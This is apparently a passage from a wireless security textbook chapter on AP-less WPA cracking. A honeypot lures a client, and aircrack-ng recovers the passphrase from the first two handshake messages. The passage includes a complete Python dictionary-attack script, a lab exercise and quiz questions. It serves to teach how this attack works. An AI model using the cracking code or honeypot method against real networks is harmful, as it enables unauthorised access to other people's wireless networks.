We will set up a WPA-PSK Honeypot with the ESSID Wireless Lab. The -z 2 option makes airbase-ng advertise a WPA (WPA1) network with TKIP as the pairwise cipher (-Z would advertise WPA2 instead):
Let's also start airodump-ng to capture packets from this network:
Now when our roaming client connects to this access point, it starts the four-way handshake but cannot complete it. The honeypot sends Message 1 (the ANonce), the client answers with Message 2 (its SNonce plus a MIC computed from the passphrase), and the handshake stalls there, because the honeypot does not know the passphrase and so cannot produce a valid Message 3. As discussed previously, Messages 1 and 2 are all that is needed to attack the handshake, and both have been captured.
We run the airodump-ng capture file through aircrack-ng with the same dictionary file as before; provided the passphrase is present in the dictionary, it is recovered just as it was with the real access point.
What just happened?
We were able to crack the WPA key with just the client and no legitimate access point in range. This was possible because the first two handshake messages already contain everything a dictionary attack needs: the SSID (from our own beacon), both MAC addresses, the ANonce we chose, the SNonce the client chose, and the MIC on Message 2. For each candidate passphrase we derive the PMK, then the PTK, and check whether the resulting key reproduces the captured MIC; a match identifies the passphrase.
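To make the "first two packets are enough" point concrete, here is an added example (not code from the book, and not aircrack-ng's own code) that reproduces the verification step aircrack-ng performs on the capture. It builds a constructed Message 2 the way a legitimate client would (with the real passphrase) and then recovers that passphrase from Message 2 alone using a constructed word list. The SSID "Wireless Lab" is the book's; the MAC addresses, nonces, passphrase and word list are assumed sample values. Key derivation follows IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID), PTK = PRF-512(PMK, nonces, MACs), and the MIC is HMAC-MD5 for WPA/TKIP (key descriptor version 1) or truncated HMAC-SHA1 for WPA2/CCMP (version 2).

```python
"""Dictionary attack on a WPA-PSK handshake from Messages 1 and 2 only.

Added example, not from the book or from aircrack-ng. All sample data
(MACs, nonces, passphrase, word list) is constructed for illustration.
"""
import hashlib
import hmac

# Offsets inside an EAPOL-Key frame: EAPOL hdr(4) + descriptor type(1)
# + key info(2) + key length(2) + replay counter(8) -> nonce at 17,
# then IV(16) + RSC(8) + key ID(8) -> MIC at 81.
NONCE_OFFSET = 17
MIC_OFFSET = 81

# Constructed sample data (only the SSID comes from the page).
SSID = "Wireless Lab"
AP_MAC = bytes.fromhex("001122334455")        # assumed honeypot MAC
CLIENT_MAC = bytes.fromhex("66778899aabb")    # assumed client MAC
ANONCE = bytes(range(32))                     # nonce we chose as the AP
SNONCE = bytes(range(32, 64))                 # nonce the client chose
PASSPHRASE = "abcdefgh"                       # assumed client passphrase
WORDLIST = ["password", "letmein", "wireless", "abcdefgh", "12345678"]


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """IEEE 802.11 PRF-512: four HMAC-SHA1 blocks with a trailing counter byte."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """PTK from PMK, both MACs and both nonces (sorted, as the standard requires)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, frame, descriptor_version):
    """MIC over the EAPOL-Key frame (MIC field zeroed), keyed with the KCK."""
    if descriptor_version == 1:      # WPA/TKIP: HMAC-MD5
        return hmac.new(kck, frame, hashlib.md5).digest()
    if descriptor_version == 2:      # WPA2/CCMP: HMAC-SHA1 truncated to 16 bytes
        return hmac.new(kck, frame, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version")


def build_message2(snonce, key_info, mic=bytes(16), key_data=b""):
    """Serialise an EAPOL-Key Message 2 (descriptor type 0xFE = WPA)."""
    body = (bytes([0xFE]) + key_info.to_bytes(2, "big") + (0).to_bytes(2, "big")
            + (1).to_bytes(8, "big") + snonce + bytes(16) + bytes(8) + bytes(8)
            + mic + len(key_data).to_bytes(2, "big") + key_data)
    return bytes([0x01, 0x03]) + len(body).to_bytes(2, "big") + body


def client_message2(passphrase, ssid, aa, spa, anonce, snonce, key_info=0x0109):
    """What a legitimate client sends: key_info 0x0109 = version 1 (TKIP), pairwise, MIC."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    mic = eapol_mic(kck, build_message2(snonce, key_info), key_info & 0x0007)
    return build_message2(snonce, key_info, mic)


def crack_handshake(ssid, aa, spa, anonce, message2, wordlist):
    """Recover the passphrase from Message 2 alone, or None if not in the word list."""
    snonce = message2[NONCE_OFFSET:NONCE_OFFSET + 32]
    captured_mic = message2[MIC_OFFSET:MIC_OFFSET + 16]
    version = int.from_bytes(message2[5:7], "big") & 0x0007
    zeroed = message2[:MIC_OFFSET] + bytes(16) + message2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed, version), captured_mic):
            return candidate
    return None


# The frame our honeypot would see from the client (constructed, not captured).
CAPTURED_MESSAGE2 = client_message2(PASSPHRASE, SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)

if __name__ == "__main__":
    print(crack_handshake(SSID, AP_MAC, CLIENT_MAC, ANONCE, CAPTURED_MESSAGE2, WORDLIST))
```

Note that the honeypot never needs to send Message 3: the MIC on Message 2 is the oracle, so the attack works the same way against the WPA2/CCMP variant (key descriptor version 2) and the cost per guess is dominated by the 4096-round PBKDF2, which is why a good word list matters more than anything else.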
Have a go hero – AP-less WPA cracking
We recommend setting different WPA-PSK passphrases on the client (keeping each one in your dictionary file) and trying this exercise a couple of times to gain confidence. You may notice that you often have to reconnect the client to get it to work, since the client has to attempt a fresh connection before it will send Message 2 to our honeypot.
Pop quiz – attacking the client
Q1. What encryption key can the Caffe Latte attack recover?
1. None
2. WEP
3. WPA
4. WPA2
Q2. What would a Honeypot access point typically use?
1. No Encryption, Open Authentication
2. No Encryption, Shared Authentication
3. WEP Encryption, Open Authentication
4. None of the above
Q3. Which one of the following is a DoS Attack?
1. Mis-Association attacks
2. Deauthentication attacks
3. Disassociation attacks
4. Both 2 and 3
Q4. What does the Caffe Latte attack require?
1. That the wireless client be in radio range of the access point
2. That the client contains a cached and stored WEP key